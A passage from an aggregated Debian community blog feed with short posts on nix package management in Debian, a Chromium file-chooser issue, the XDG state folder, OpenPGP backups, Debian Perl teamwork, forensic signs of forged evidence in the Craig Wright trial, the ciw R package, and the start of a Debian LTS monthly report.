<p>The <a href="https://nixos.org">nix</a> package manager is <a href="https://tracker.debian.org/pkg/nix">available in Debian</a> since <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=877019">May 2020</a>. Why would one use it in Debian?</p>
<ul>
<li>learn about nix</li>
<li>install software that might not be available in Debian</li>
<li>install software without root access</li>
<li>declare software necessary for a user’s environment inside <code>$HOME/.config</code></li>
</ul>
<p>Especially the last point nagged me every time I set up a new Debian installation. My emacs configuration and my Desktop setup expects certain software to be installed.</p>
<p>Please be aware that I’m a beginner with nix and that my config might not follow best practice. Additionally many nix users are already using the new flakes feature of nix that I’m still learning about.</p>
<p>So I’ve got this file at <code>.config/nixpkgs/config.nix</code><a class="footnote-ref" href="https://blog.koch.ro/tags/debian.atom.xml#fn1" id="fnref1"><sup>1</sup></a>:</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode nix"><code class="sourceCode bash"><span id="cb1-1"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-1"></a><span class="ex">with</span> (import <span class="op"><</span>nixpkgs<span class="op">></span> {});</span>
<span id="cb1-2"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-2"></a><span class="kw">{</span></span>
<span id="cb1-3"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-3"></a> <span class="ex">packageOverrides</span> = pkgs: with pkgs<span class="kw">;</span> <span class="kw">{</span></span>
<span id="cb1-4"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-4"></a> <span class="ex">thk-emacsWithPackages</span> = (pkgs.emacsPackagesFor emacs-gtk)<span class="ex">.emacsWithPackages</span> (</span>
<span id="cb1-5"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-5"></a> <span class="ex">epkgs</span>:</span>
<span id="cb1-6"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-6"></a> <span class="kw">(</span><span class="ex">with</span> epkgs.elpaPackages<span class="kw">;</span><span class="bu"> [</span></span>
<span id="cb1-7"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-7"></a> ace-window</span>
<span id="cb1-8"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-8"></a> company</span>
<span id="cb1-9"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-9"></a> org</span>
<span id="cb1-10"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-10"></a> use-package</span>
<span id="cb1-11"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-11"></a> ]) ++ (with epkgs.melpaPackages; [</span>
<span id="cb1-12"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-12"></a> editorconfig</span>
<span id="cb1-13"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-13"></a> flycheck</span>
<span id="cb1-14"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-14"></a> haskell-mode</span>
<span id="cb1-15"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-15"></a> magit</span>
<span id="cb1-16"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-16"></a> nix-mode</span>
<span id="cb1-17"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-17"></a> paredit</span>
<span id="cb1-18"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-18"></a> rainbow-delimiters</span>
<span id="cb1-19"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-19"></a> treemacs</span>
<span id="cb1-20"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-20"></a> visual-fill-column</span>
<span id="cb1-21"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-21"></a> yasnippet-snippets</span>
<span id="cb1-22"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-22"></a> ]) ++ [ # From main packages set</span>
<span id="cb1-23"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-23"></a> ]</span>
<span id="cb1-24"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-24"></a> );</span>
<span id="cb1-25"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-25"></a></span>
<span id="cb1-26"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-26"></a> userPackages <span class="ot">=</span> buildEnv {</span>
<span id="cb1-27"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-27"></a> extraOutputsToInstall <span class="ot">=</span> [ <span class="st">"doc"</span> <span class="st">"info"</span> <span class="st">"man"</span><span class="bu"> ]</span>;</span>
<span id="cb1-28"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-28"></a> <span class="ex">name</span> = <span class="st">"user-packages"</span><span class="kw">;</span></span>
<span id="cb1-29"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-29"></a> <span class="ex">paths</span> = [</span>
<span id="cb1-30"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-30"></a> <span class="ex">ghc</span></span>
<span id="cb1-31"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-31"></a> <span class="fu">git</span></span>
<span id="cb1-32"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-32"></a> <span class="kw">(</span><span class="ex">pkgs.haskell-language-server.override</span> { supportedGhcVersions = [ <span class="st">"94"</span> ]<span class="kw">;</span> }<span class="kw">)</span></span>
<span id="cb1-33"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-33"></a> <span class="ex">nix</span></span>
<span id="cb1-34"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-34"></a> <span class="ex">stack</span></span>
<span id="cb1-35"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-35"></a> <span class="ex">thk-emacsWithPackages</span></span>
<span id="cb1-36"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-36"></a> <span class="ex">tmux</span></span>
<span id="cb1-37"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-37"></a> <span class="ex">vcsh</span></span>
<span id="cb1-38"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-38"></a> <span class="ex">virtiofsd</span></span>
<span id="cb1-39"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-39"></a> ];</span>
<span id="cb1-40"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-40"></a> };</span>
<span id="cb1-41"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-41"></a> };</span>
<span id="cb1-42"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb1-42"></a>}</span></code></pre></div>
<p>Every time I change the file or want to receive updates, I do:</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode bash"><code class="sourceCode bash"><span id="cb2-1"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb2-1"></a><span class="ex">nix-env</span> --install --attr nixpkgs.userPackages --remove-all</span></code></pre></div>
<p>You can see that I install nix with nix. This gives me a newer version than the one available in Debian stable. However, the nix-daemon still runs as the older binary from Debian. My dirty hack is to put this override in <code>/etc/systemd/system/nix-daemon.service.d/override.conf</code>:</p>
<div class="sourceCode" id="cb3"><pre class="sourceCode ini"><code class="sourceCode ini"><span id="cb3-1"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb3-1"></a><span class="kw">[Service]</span></span>
<span id="cb3-2"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb3-2"></a><span class="dt">ExecStart</span><span class="ot">=</span></span>
<span id="cb3-3"><a href="https://blog.koch.ro/tags/debian.atom.xml#cb3-3"></a><span class="dt">ExecStart</span><span class="ot">=</span><span class="st">@/home/thk/.local/state/nix/profile/bin/nix-daemon nix-daemon --daemon</span></span></code></pre></div>
<p>I’m not too interested in a cleaner way since I hope to fully migrate to Nix anyways.</p>
<section class="footnotes">
<hr />
<ol>
<li id="fn1"><p>Note the <code>nixpkgs</code> in the path. This is not a config file for <code>nix</code> the package manager but for the <a href="https://github.com/NixOS/nixpkgs">nix package collection</a>. See the <a href="https://nixos.org/manual/nixpkgs/stable/#chap-packageconfig">nixpkgs manual</a>.<a class="footnote-back" href="https://blog.koch.ro/tags/debian.atom.xml#fnref1">↩︎</a></p></li>
</ol>
</section>2024-03-17T10:13:40+00:00Thomas KochThomas Koch: Chromium gtk-filechooser preview size
https://blog.koch.ro/posts/2024-01-09-chromium-gtk-filechooser-preview-size.html
<div class="info">
Posted on January 9, 2024
</div>
<div class="info">
Tags: <a href="https://blog.koch.ro/tags/debian.html" title="All pages tagged 'debian'.">debian</a>, <a href="https://blog.koch.ro/tags/free%20software.html" title="All pages tagged 'free software'.">free software</a>, <a href="https://blog.koch.ro/tags/life.html" title="All pages tagged 'life'.">life</a>
</div>
<p>I wanted to report this issue in <a href="https://bugs.chromium.org/p/chromium/issues/wizard">chromiums issue tracker</a>, but it gave me:</p>
<blockquote>
<p>“Something went wrong, please try again later.”</p>
</blockquote>
<p>Ok, then at least let me reply to this <a href="https://askubuntu.com/questions/788408/open-upload-file-dialogue-make-file-preview-larger">askubuntu question</a>. But my attempt to signup with my launchpad account gave me:</p>
<blockquote>
<p>“Launchpad Login Failed. Please try logging in again.”</p>
</blockquote>
<p>I refrain from commenting on this to not violate some code of conduct.</p>
<p>So this is what I wanted to write:</p>
<blockquote>
<p><strong>GTK file chooser image preview size should be configurable</strong></p>
<p>The file chooser that appears when uploading a file (e.g. an image to Google Fotos) learned to show a preview in <a href="https://bugs.chromium.org/p/chromium/issues/detail?id=15500">issue 15500</a>.</p>
<p>The preview image size is hard coded to 256x512 in kPreviewWidth and kPreviewHeight in <a href="https://source.chromium.org/chromium/chromium/src/+/main:ui/gtk/select_file_dialog_linux_gtk.cc;drc=d0b88a2bb42b34c43720c0e9ee2543e4c9df3071;l=160"><code>ui/gtk/select_file_dialog_linux_gtk.cc</code></a>.</p>
<p>Please make the size configurable.</p>
<p>On high DPI screens the images are too small to be of much use.</p>
</blockquote>
<p>Yes, I should not use chromium anymore.</p>2024-03-17T10:13:40+00:00Thomas KochThomas Koch: Good things come ... state folder
https://blog.koch.ro/posts/2024-01-02-good-things-state-folder.html
<div class="info">
Posted on January 2, 2024
</div>
<div class="info">
Tags: <a href="https://blog.koch.ro/tags/debian.html" title="All pages tagged 'debian'.">debian</a>, <a href="https://blog.koch.ro/tags/free%20software.html" title="All pages tagged 'free software'.">free software</a>, <a href="https://blog.koch.ro/tags/life.html" title="All pages tagged 'life'.">life</a>
</div>
<p>Just a little while ago (10 years) <a href="https://lists.freedesktop.org/pipermail/xdg/2012-December/012598.html">I proposed</a> the <a href="https://web.archive.org/web/20161127085425/http://koch.ro/blog/index.php?/archives/163-Waiting-for-a-STATE-folder-in-the-XDG-basedir-spec.html">addition of a state folder</a> to the <a href="https://specifications.freedesktop.org/basedir-spec/basedir-spec-latest.html">XDG basedir specification</a> and expanded the article <a href="https://wiki.debian.org/XDGBaseDirectorySpecification">XDGBaseDirectorySpecification</a> in the Debian wiki. Recently <a href="https://www.reddit.com/r/linux/comments/ny34vs/new_xdg_state_home_in_xdg_base_directory_spec/?rdt=53526">I learned</a>, that version 0.8 (from May 2021) of the spec finally includes a state folder.</p>
<p>Granted, I wasn’t the <a href="https://lists.freedesktop.org/pipermail/xdg/2009-February/010191.html">first to have this idea</a> (2009), nor the one who actually <a href="https://lists.freedesktop.org/archives/xdg/2021-February/014434.html">made it happen</a>.</p>
<p>Now, please go ahead and use it! Thank you.</p>2024-03-17T10:13:40+00:00Thomas KochPatryk Cisek: OpenPGP Paper Backup
https://prezu.ca/post/openpgp-paper-backup/
openpgp-paper-backup I’ve been using OpenPGP through GnuPG since early 2000’. It’s an essential part of Debian Developer’s workflow. We use it regularly to authenticate package uploads and votes. Proper backups of that key are really important.
Up until recently, the only reliable option for me was backing up a tarball of my ~/.gnupg offline on a set few flash drives. This approach is better than nothing, but it’s not nearly as reliable as I’d like it to be.2024-03-15T21:42:39+00:00l (Patryk CisekGregor Herrmann: teamwork in practice
https://info.comodo.priv.at/blog/teamwork_in_practice.html
<p>teamwork, or: why I love the Debian Perl Group:</p>
<p>elbrus has introduced a (very untypical) <a href="https://tracker.debian.org/pkg/libmediascan">package</a> into the
Debian Perl Group in 2022.</p>
<p>after changes of the default compiler options
<code>(-Werror=implicit-function-declaration)</code> in debian, it didn't
build any more & received an <a href="https://bugs.debian.org/1066249">RC bug</a>.</p>
<p>because I sometimes like challenges, I had a look at it & cobbled together
a patch. as I hardly speak any C, I sent my notes to the bug report
& (implictly) asked for help. – & went out to meet a
friend.</p>
<p>when I came home, I found an email from ntyni, sent less than 2 hours
after my mail, where he friendly pointed out the issues with my patch
– & sent a corrected version.</p>
<p>all I needed to do was to adjust the patch & upload the package. one
more bug fixed, one less task for us, & elbrus can concentrate on more
important tasks :)<br /> thanks again, niko!</p>2024-03-14T22:10:53+00:00Gregor HerrmannMatthew Garrett: Digital forgeries are hard
https://mjg59.dreamwidth.org/69507.html
Closing arguments in the trial between various people and <a href="https://en.wikipedia.org/wiki/Craig_Steven_Wright">Craig Wright</a> over whether he's <a href="https://en.wikipedia.org/wiki/Satoshi_Nakamoto">Satoshi Nakamoto</a> are wrapping up today, amongst a bewildering array of presented evidence. But one utterly astonishing aspect of this lawsuit is that expert witnesses for <em>both</em> sides agreed that much of the digital evidence provided by Craig Wright was unreliable in one way or another, generally including indications that it wasn't produced at the point in time it claimed to be. And it's fascinating reading through the subtle (and, in some cases, not so subtle) ways that that's revealed.<br /><br />One of the pieces of evidence entered is screenshots of data from <a href="https://myob.com">Mind Your Own Business</a>, a business management product that's been around for some time. Craig Wright relied on screenshots of various entries from this product to support his claims around having controlled meaningful number of bitcoin before he was publicly linked to being Satoshi. If these were authentic then they'd be strong evidence linking him to the mining of coins before Bitcoin's public availability. Unfortunately the screenshots themselves weren't contemporary - the metadata shows them being created in 2020. This wouldn't fundamentally be a problem (it's entirely reasonable to create new screenshots of old material), as long as it's possible to establish that the material shown in the screenshots was created at that point. Sadly, well.<br /><br />One part of the disclosed information was an email that contained a zip file that contained a raw database in the format used by MYOB. Importing that into the tool allowed an audit record to be extracted - this record showed that the relevant entries had been added to the database in 2020, shortly before the screenshots were created. This was, obviously, not strong evidence that Craig had held Bitcoin in 2009. This evidence was reported, and was responded to with a couple of additional databases that had an audit trail that was consistent with the dates in the records in question. Well, partially. The audit record included session data, showing an administrator logging into the data base in 2011 and then, uh, logging out in 2023, which is rather more consistent with someone changing their system clock to 2011 to create an entry, and switching it back to present day before logging out. In addition, the audit log included fields that didn't exist in versions of the product released before 2016, strongly suggesting that the entries dated 2009-2011 were created in software released after 2016. And even worse, the order of insertions into the database didn't line up with calendar time - an entry dated before another entry may appear in the database afterwards, indicating that it was created later. But even more obvious? The database schema used for these old entries corresponded to a version of the software released in 2023.<br /><br />This is all consistent with the idea that these records were created after the fact and backdated to 2009-2011, and that after this evidence was made available further evidence was created and backdated to obfuscate that. In an unusual turn of events, during the trial Craig Wright introduced further evidence in the form of a chain of emails to his former lawyers that indicated he had provided them with login details to his MYOB instance in 2019 - before the metadata associated with the screenshots. The implication isn't entirely clear, but it suggests that either they had an opportunity to examine this data before the metadata suggests it was created, or that they faked the data? So, well, the obvious thing happened, and his former lawyers were asked whether they received these emails. The chain consisted of three emails, two of which they confirmed they'd received. And they received a third email in the chain, but it was different to the one entered in evidence. And, uh, weirdly, they'd received a copy of the email that was submitted - but they'd received it a few days earlier. In 2024.<br /><br />And again, the forensic evidence is helpful here! It turns out that the email client used associates a timestamp with any attachments, which in this case included an image in the email footer - and the mysterious time travelling email had a timestamp in 2024, not 2019. This was created by the client, so was consistent with the email having been sent in 2024, not being sent in 2019 and somehow getting stuck somewhere before delivery. The date header indicates 2019, as do encoded timestamps in the MIME headers - consistent with the mail being sent by a computer with the clock set to 2019.<br /><br />But there's a very weird difference between the copy of the email that was submitted in evidence and the copy that was located afterwards! The first included a header inserted by gmail that included a 2019 timestamp, while the latter had a 2024 timestamp. Is there a way to determine which of these could be the truth? It turns out there is! The format of that header changed in 2022, and the version in the email is the new version. The version with the 2019 timestamp is anachronistic - the format simply doesn't match the header that gmail would have introduced in 2019, suggesting that an email sent in 2022 or later was modified to include a timestamp of 2019.<br /><br />This is by no means the only indication that Craig Wright's evidence may be misleading (there's the whole argument that the Bitcoin white paper was written in LaTeX when general consensus is that it's written in OpenOffice, given that's what the metadata claims), but it's a lovely example of a more general issue.<br /><br />Our technology chains are complicated. So many moving parts end up influencing the content of the data we generate, and those parts develop over time. It's fantastically difficult to generate an artifact now that precisely corresponds to how it would look in the past, even if we go to the effort of installing an old OS on an old PC and setting the clock appropriately (are you sure you're going to be able to mimic an entirely period appropriate patch level?). Even the version of the font you use in a document may indicate it's anachronistic. I'm pretty good at computers and I no longer have any belief I could fake an old document.<br /><br />(References: <a href="https://www.dropbox.com/scl/fo/4y3gdele4foy15006z8ch/h?rlkey=scs42wew1o3vwfv0nduhc43dm&dl=0">this Dropbox</a>, under "Expert reports", "Patrick Madden". Initial MYOB data is in "Appendix PM7", further analysis is in "Appendix PM42", email analysis is "Sixth Expert Report of Mr Patrick Madden")<br /><br /><img alt="comment count unavailable" height="12" src="https://www.dreamwidth.org/tools/commentcount?user=mjg59&ditemid=69507" style="vertical-align: middle;" width="30" /> comments2024-03-14T09:11:32+00:00Matthew GarrettDirk Eddelbuettel: ciw 0.0.1 on CRAN: New Package!
http://dirk.eddelbuettel.com/blog/2024/03/13#ciw_0.0.1
<p>Happy to share that <a href="https://dirk.eddelbuettel.com/code/ciw.html">ciw</a> is now on <a href="https://cran.r-project.org">CRAN</a>! I had tooted a little bit
about it, <em>e.g.</em>, <a href="https://mastodon.social/@eddelbuettel/112016349028986595">here</a>.
What it provides is a single (efficient) function
<code>incoming()</code> which summarises the state of the incoming
directories at <a href="https://cran.r-project.org">CRAN</a>. I happen
to like having these things at my (shell) fingertips, so it goes along
with (still draft) <a href="https://github.com/eddelbuettel/littler/blob/master/inst/examples/ciw.r">wrapper
ciw.r</a> that will be part of the next <a href="https://github.com/eddelbuettel/littler">littler</a> release.</p>
<p>For example, when I do this right now as I type this, I see</p>
<div class="sourceCode" id="cb1"><pre class="sourceCode sh"><code class="sourceCode bash"><span id="cb1-1"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-1" tabindex="-1"></a><span class="ex">edd@rob:~$</span> ciw.r</span>
<span id="cb1-2"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-2" tabindex="-1"></a> <span class="ex">Folder</span> Name Time Size Age</span>
<span id="cb1-3"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-3" tabindex="-1"></a> <span class="op"><</span>char<span class="op">></span> <span class="op"><</span>char<span class="op">></span> <span class="op"><</span>POSc<span class="op">></span> <span class="op"><</span>char<span class="op">></span> <span class="op"><</span>difftime<span class="op">></span></span>
<span id="cb1-4"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-4" tabindex="-1"></a><span class="ex">1:</span> waiting maximin_1.0-5.tar.gz 2024-03-13 22:22:00 20K 2.48 hours</span>
<span id="cb1-5"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-5" tabindex="-1"></a><span class="ex">2:</span> inspect GofCens_0.97.tar.gz 2024-03-13 21:12:00 29K 3.65 hours</span>
<span id="cb1-6"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-6" tabindex="-1"></a><span class="ex">3:</span> inspect verbalisr_0.5.2.tar.gz 2024-03-13 20:09:00 79K 4.70 hours</span>
<span id="cb1-7"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-7" tabindex="-1"></a><span class="ex">4:</span> waiting rnames_1.0.1.tar.gz 2024-03-12 15:04:00 2.7K 33.78 hours</span>
<span id="cb1-8"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-8" tabindex="-1"></a><span class="ex">5:</span> waiting PCMBase_1.2.14.tar.gz 2024-03-10 12:32:00 406K 84.32 hours</span>
<span id="cb1-9"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-9" tabindex="-1"></a><span class="ex">6:</span> pending MPCR_1.1.tar.gz 2024-02-22 11:07:00 903K 493.73 hours</span>
<span id="cb1-10"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb1-10" tabindex="-1"></a><span class="ex">edd@rob:~$</span> </span></code></pre></div>
<p>which is rather compact as <a href="https://cran.r-project.org">CRAN</a> kept busy! This call runs in
about (or just over) one second, which includes launching
<code>r</code>. Good enough for me. From a well-connected EC2 instance
it is about 800ms on the command-line. When I do I from here inside an R
session it is maybe 700ms. And doing it over in Europe is faster still.
(I am using <code>ping=FALSE</code> for these to omit the default sanity
check of ‘can I haz networking?’ to speed things up. The check adds
another 200ms or so.)</p>
<p>The function (and the wrapper) offer a ton of options too this is
ridiculously easy to do thanks to the <a href="https://cloud.r-project.org/package=docopt">docopt</a>
package:</p>
<div class="sourceCode" id="cb2"><pre class="sourceCode sh"><code class="sourceCode bash"><span id="cb2-1"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-1" tabindex="-1"></a><span class="ex">edd@rob:~$</span> ciw.r <span class="at">-x</span></span>
<span id="cb2-2"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-2" tabindex="-1"></a><span class="ex">Usage:</span> ciw.r [-h] [-x] [-a] [-m] [-i] [-t] [-p] [-w] [-r] [-s] [-n] [-u] [-l rows] [-z] [ARG...]</span>
<span id="cb2-3"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-3" tabindex="-1"></a></span>
<span id="cb2-4"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-4" tabindex="-1"></a><span class="ex">-m</span> <span class="at">--mega</span> use <span class="st">'mega'</span> mode of all folders <span class="er">(</span><span class="ex">see</span> <span class="at">--usage</span><span class="kw">)</span></span>
<span id="cb2-5"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-5" tabindex="-1"></a><span class="ex">-i</span> <span class="at">--inspect</span> visit <span class="st">'inspect'</span> folder</span>
<span id="cb2-6"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-6" tabindex="-1"></a><span class="ex">-t</span> <span class="at">--pretest</span> visit <span class="st">'pretest'</span> folder</span>
<span id="cb2-7"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-7" tabindex="-1"></a><span class="ex">-p</span> <span class="at">--pending</span> visit <span class="st">'pending'</span> folder</span>
<span id="cb2-8"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-8" tabindex="-1"></a><span class="ex">-w</span> <span class="at">--waiting</span> visit <span class="st">'waiting'</span> folder</span>
<span id="cb2-9"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-9" tabindex="-1"></a><span class="ex">-r</span> <span class="at">--recheck</span> visit <span class="st">'waiting'</span> folder</span>
<span id="cb2-10"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-10" tabindex="-1"></a><span class="ex">-a</span> <span class="at">--archive</span> visit <span class="st">'archive'</span> folder</span>
<span id="cb2-11"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-11" tabindex="-1"></a><span class="ex">-n</span> <span class="at">--newbies</span> visit <span class="st">'newbies'</span> folder</span>
<span id="cb2-12"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-12" tabindex="-1"></a><span class="ex">-u</span> <span class="at">--publish</span> visit <span class="st">'publish'</span> folder</span>
<span id="cb2-13"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-13" tabindex="-1"></a><span class="ex">-s</span> <span class="at">--skipsort</span> skip sorting of aggregate results by age</span>
<span id="cb2-14"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-14" tabindex="-1"></a><span class="ex">-l</span> <span class="at">--lines</span> rows print top <span class="st">'rows'</span> of the result object [default: 50]</span>
<span id="cb2-15"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-15" tabindex="-1"></a><span class="ex">-z</span> <span class="at">--ping</span> run the connectivity check first</span>
<span id="cb2-16"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-16" tabindex="-1"></a><span class="ex">-h</span> <span class="at">--help</span> show this help text</span>
<span id="cb2-17"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-17" tabindex="-1"></a><span class="ex">-x</span> <span class="at">--usage</span> show help and short example usage </span>
<span id="cb2-18"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-18" tabindex="-1"></a></span>
<span id="cb2-19"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-19" tabindex="-1"></a><span class="ex">where</span> ARG... can be one or more file name, or directories or package names.</span>
<span id="cb2-20"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-20" tabindex="-1"></a></span>
<span id="cb2-21"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-21" tabindex="-1"></a><span class="ex">Examples:</span></span>
<span id="cb2-22"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-22" tabindex="-1"></a> <span class="ex">ciw.r</span> <span class="at">-ip</span> <span class="co"># run in 'inspect' and 'pending' mode</span></span>
<span id="cb2-23"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-23" tabindex="-1"></a> <span class="ex">ciw.r</span> <span class="at">-a</span> <span class="co"># run with mode 'auto' resolved in incoming()</span></span>
<span id="cb2-24"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-24" tabindex="-1"></a> <span class="ex">ciw.r</span> <span class="co"># run with defaults, same as '-itpwr'</span></span>
<span id="cb2-25"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-25" tabindex="-1"></a></span>
<span id="cb2-26"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-26" tabindex="-1"></a><span class="ex">When</span> no argument is given, <span class="st">'auto'</span> is selected which corresponds to <span class="st">'inspect'</span>, <span class="st">'waiting'</span>,</span>
<span id="cb2-27"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-27" tabindex="-1"></a><span class="st">'pending'</span><span class="ex">,</span> <span class="st">'pretest'</span>, and <span class="st">'recheck'</span>. Selecting <span class="st">'-m'</span> or <span class="st">'--mega'</span> are select as default.</span>
<span id="cb2-28"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-28" tabindex="-1"></a></span>
<span id="cb2-29"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-29" tabindex="-1"></a><span class="ex">Folder</span> selecting arguments are cumulative<span class="kw">;</span> <span class="ex">but</span> <span class="st">'mega'</span> is a single selections of all folders</span>
<span id="cb2-30"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-30" tabindex="-1"></a><span class="kw">(</span><span class="ex">i.e.</span> <span class="st">'inspect'</span>, <span class="st">'waiting'</span>, <span class="st">'pending'</span>, <span class="st">'pretest'</span>, <span class="st">'recheck'</span>, <span class="st">'archive'</span>, <span class="st">'newbies'</span>, <span class="st">'publish'</span><span class="kw">)</span><span class="bu">.</span></span>
<span id="cb2-31"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-31" tabindex="-1"></a></span>
<span id="cb2-32"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-32" tabindex="-1"></a><span class="ex">ciw.r</span> is part of littler which brings <span class="st">'r'</span> to the command-line.</span>
<span id="cb2-33"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-33" tabindex="-1"></a><span class="ex">See</span> https://dirk.eddelbuettel.com/code/littler.html for more information.</span>
<span id="cb2-34"><a href="https://dirk.eddelbuettel.com/blog/index.rss#cb2-34" tabindex="-1"></a><span class="ex">edd@rob:~$</span> </span></code></pre></div>
<p>The README at the <a href="https://github.com/eddelbuettel/ciw">git
repo</a> and the <a href="https://cran.r-project.org/package=ciw">CRAN
page</a> offer a ‘screenshot movie’ showing some of the options in
action.</p>
<p>I have been using the little tools quite a bit over the last two or
three weeks since I first put it together and find it quite handy. With
that again a big <em>Thank You!</em> of appcreciation for all that <a href="https://cran.r-project.org">CRAN</a> does—which this week included
letting this past the <em>newbies</em> desk in under 24 hours.</p>
<p>If you like this or other open-source work I do, you can <a href="https://github.com/sponsors/eddelbuettel">sponsor me at
GitHub</a>.</p>
<p style="font-size: 80%; font-style: italic;">
This post by <a href="https://dirk.eddelbuettel.com">Dirk
Eddelbuettel</a> originated on his <a href="https://dirk.eddelbuettel.com/blog/">Thinking inside the box</a>
blog. Please report excessive re-aggregation in third-party for-profit
settings.
</p><p></p>2024-03-14T00:03:00+00:00Dirk EddelbuettelFreexian Collaborators: Monthly report about Debian Long Term Support, February 2024 (by Roberto C. Sánchez)
https://www.freexian.com/blog/debian-lts-report-2024-02/
<img src="https://www.freexian.com/images/debian-lts-logo.png" style="float: right;" />
<p>Like each month, have a look at the work funded by <a href="https://www.freexian.com/lts/debian/">Freexian’s Debian LTS offering</a>.</p>
<h3 id="debian-lts-contributors">Debian LTS contributors</h3>
<p>In February, 18 contributors have been paid to work on <a href="https://wiki.debian.org/LTS">Debian
LTS</a>, their reports are available:</p>
<ul>
<li><a href="https://people.debian.org/~abhijith/reports/LTS_ELTS-February-2024.txt">Abhijith PA</a>
did 10.0h (out of 14.0h assigned), thus carrying over 4.0h to the next month.</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00008.html">Adrian Bunk</a>
did 13.5h (out of 24.25h assigned and 41.75h from previous period), thus carrying over 52.5h to the next month.</li>
<li><a href="https://lists.debian.org/debian-lts/2024/03/msg00007.html">Bastien Roucariès</a>
did 20.0h (out of 20.0h assigned).</li>
<li><a href="https://www.decadent.org.uk/ben/blog/2024/03/03/foss-activity-in-february-2024.html">Ben Hutchings</a>
did 2.0h (out of 14.5h assigned and 9.5h from previous period), thus carrying over 22.0h to the next month.</li>
<li><a href="https://chris-lamb.co.uk/posts/free-software-activities-in-february-2024#debian-lts">Chris Lamb</a>
did 18.0h (out of 18.0h assigned).</li>
